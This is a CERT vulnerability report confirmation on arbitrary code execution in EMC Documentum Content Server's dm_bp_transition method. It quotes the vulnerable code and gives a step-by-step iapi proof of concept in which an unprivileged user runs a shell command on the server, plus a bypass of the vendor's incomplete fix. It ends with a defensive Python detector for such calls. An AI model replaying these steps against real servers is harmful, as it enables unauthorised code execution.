Vulnerability Report Confirmation - [VRF#HUFPRMOP]

Your vulnerability report has been successfully received. The Report Tracking ID assigned to this report is VRF#HUFPRMOP. Details of your report are listed below.

------------------------------------------------------------------------

Vulnerability Report

Name: Andrey B. Panfilov
Organization: independent
Email Address: andrew@panfilov.tel

Vulnerability Description:

EMC Documentum Content Server: arbitrary code execution in dm_bp_transition.ebs

The vendor was notified about this vulnerability in November 2013. Although the vendor claims that the vulnerability has been fixed, the fix was never announced and is incomplete.

Provided PoC:

Docbase method information:

API> retrieve,c,dm_method where object_name='dm_bp_transition'
...
1001ffd780000176
API> dump,c,l
...
USER ATTRIBUTES

  object_name    : dm_bp_transition
  owner_name     : dmadmin
  owner_permit   : 7
  group_name     : docu
  group_permit   : 5
  world_permit   : 3
  method_verb    : ./dmbasic -f./dm_bp_transition.ebs -eBP_Transition
  method_args  []:
  launch_direct  : T
  launch_async   : F
  trace_launch   : F
  run_as_server  : T

Vulnerable code (userPostprocID$ is a user-input parameter):

Sub BP_Transition(_
    docbase_name$,_
    server_config_name$,_
    user_name$,_
    user_ticket$,_
    sysID$,_
    policyID$,_
    aliasID$,_
    userEntryID$,_
    actionID$,_
    userActionID$,_
    userPostprocID$,_
    targetState$,_
    targetStateNo$,_
    resumeStateNo$,_
    run_entry$,_
    run_actions$,_
    commitFlag$,_
    attachFlag$,_
    login_as$,_
    orig_sessionID$)
.....
    If (result = True And commitFlag = "T") Then
        If (debug = True) Then
            PrintToLog sess, "Commit the changes."
        End If
        result = CommitIt(sess, sysID, policyID, aliasID, targetStateNo, resumeStateNo, attachFlag)
        If (result = True) Then
            If (debug = True) Then
                PrintToLog sess, "Run post action."
            End If
            result = RunProcedure(userPostprocID, 4, sess, sysID,_
                user_name, targetState)
        End If
    Else

Exploitation:

$ cat /tmp/test
cat: /tmp/test: No such file or directory
$ cat > test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
    ByVal ObjectId As String,_
    ByVal UserName As String,_
    ByVal TargetState As String,_
    ByRef ErrorString As String) As Boolean
    t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
    EntryCriteria=True
End Function
$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): unprivileged_user
Please enter password for unprivileged_user:

EMC Documentum iapi - Interactive API interface
(c) Copyright EMC Corp., 1992 - 2011
All rights reserved.
Client Library Release 6.7.1000.0027

Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info:  "Session 0101d920800b1a37 started for user unprivileged_user."

Connected to Documentum Server running Release 6.7.1090.0170  Linux.Oracle
Session id is s0
API> create,c,dm_procedure
...
0801d920804e5416
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with method='dm_bp_transition', arguments='repo repo dmadmin "" 0000000000000000 0000000000000000 0000000000000000 0801d920804e5416 0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000'
(1 row affected)
API> Bye
$ cat /tmp/test
dm_bp_transition_has_vulnerability

The vendor decided that the root cause of the problem is that users are able to create dm_procedure objects, so Documentum Content Server v6.7SP1P26 now behaves as follows:

[DM_SESSION_I_SESSION_START]info:  "Session 0101d920800f0174 started for user unprivileged_user."

Connected to Documentum Server running Release 6.7.1260.0322  Linux.Oracle
Session id is s0
API> create,c,dm_procedure
...
0801d920805929d0
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
[DM_USER_E_NEED_SU_OR_SYS_PRIV]error:  "The current user (unprivileged_user) needs to have superuser or sysadmin privilege."

BUT:

API> create,c,dm_document
...
0901d920805929dd
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with method='dm_bp_transition',arguments='repo repo dmadmin "" 0000000000000000 0000000000000000 0000000000000000 0901d920805929dd 0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000'
(1 row affected)
....
API> Bye
~]$ cat /tmp/test
dm_bp_transition_has_vulnerability
~]$

Can we provide your name to the vendor? Yes
Do you want to be publicly acknowledged? Yes
Vendor Contact Status: will not contact
Vendor Name: EMC
Affected System Configurations: All versions of Documentum Content Server
Is the vulnerability being exploited? Yes
Is there a public exploit? Yes
Date: 2014-04-25T12:48:51
Report Tracking ID: VRF#HUFPRMOP
CERT Tracking IDs: VU#315340

------------------------------------------------------------------------
©2014 Carnegie Mellon University
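A defender-side check for the do_method invocations quoted in the report above, added here as an example and not part of the report or of Documentum itself: it maps the argument string onto the BP_Transition parameters and flags any procedure slot (userEntryID, actionID, userActionID, userPostprocID) whose object ID does not carry the dm_procedure type tag, which is exactly the post-patch bypass the report demonstrates with a dm_document. The type tags (08 = dm_procedure, 09 = dm_document) are inferred from the object IDs in the transcripts, and the sample DQL is constructed from the report's own command.

```python
import re
import shlex

# Positional parameters of BP_Transition, in the order of the Sub signature quoted in the report.
BP_TRANSITION_PARAMS = [
    "docbase_name", "server_config_name", "user_name", "user_ticket",
    "sysID", "policyID", "aliasID", "userEntryID", "actionID",
    "userActionID", "userPostprocID", "targetState", "targetStateNo",
    "resumeStateNo", "run_entry", "run_actions", "commitFlag",
    "attachFlag", "login_as", "orig_sessionID",
]
# Parameters whose value names an object that the script loads and runs as code.
PROCEDURE_SLOTS = ("userEntryID", "actionID", "userActionID", "userPostprocID")
# Type tag = first two hex digits of an r_object_id, inferred from the IDs in
# the report: 08 = dm_procedure, 09 = dm_document, 10 = dm_method.
DM_PROCEDURE_TAG = "08"
NULL_ID = "0000000000000000"
_DO_METHOD = re.compile(
    r"do_method\s+with\s+method\s*=\s*'(?P<method>[^']*)'\s*,\s*"
    r"arguments\s*=\s*'(?P<args>[^']*)'", re.IGNORECASE)

def parse_do_method(dql):
    """Return (method, {param: value}) for a do_method statement, else None."""
    m = _DO_METHOD.search(dql)
    if not m:
        return None
    args = shlex.split(m.group("args"))  # shlex keeps "" as an empty token
    return m.group("method"), dict(zip(BP_TRANSITION_PARAMS, args))

def suspicious_procedure_refs(dql):
    """List (slot, id) pairs where a dm_bp_transition call points a procedure
    slot at an object that is not a dm_procedure (e.g. a dm_document)."""
    parsed = parse_do_method(dql)
    if parsed is None or parsed[0].lower() != "dm_bp_transition":
        return []
    findings = []
    for slot in PROCEDURE_SLOTS:
        oid = parsed[1].get(slot, "")
        if oid in ("", NULL_ID):
            continue  # unset slot: nothing will be executed from it
        if len(oid) != 16 or oid[:2].lower() != DM_PROCEDURE_TAG:
            findings.append((slot, oid))
    return findings

# Constructed sample, modelled on the bypass command in the report.
SAMPLE_BYPASS = ("execute do_method with method='dm_bp_transition',arguments='"
                 "repo repo dmadmin \"\" 0000000000000000 0000000000000000 "
                 "0000000000000000 0901d920805929dd 0000000000000000 "
                 "0000000000000000 0000000000000000 \"\" 0 0 T F T T dmadmin "
                 "0000000000000000'")
```

Run `suspicious_procedure_refs` over audit-trail or server-log DQL text to surface dm_bp_transition calls that hand a non-procedure object to one of the executable slots.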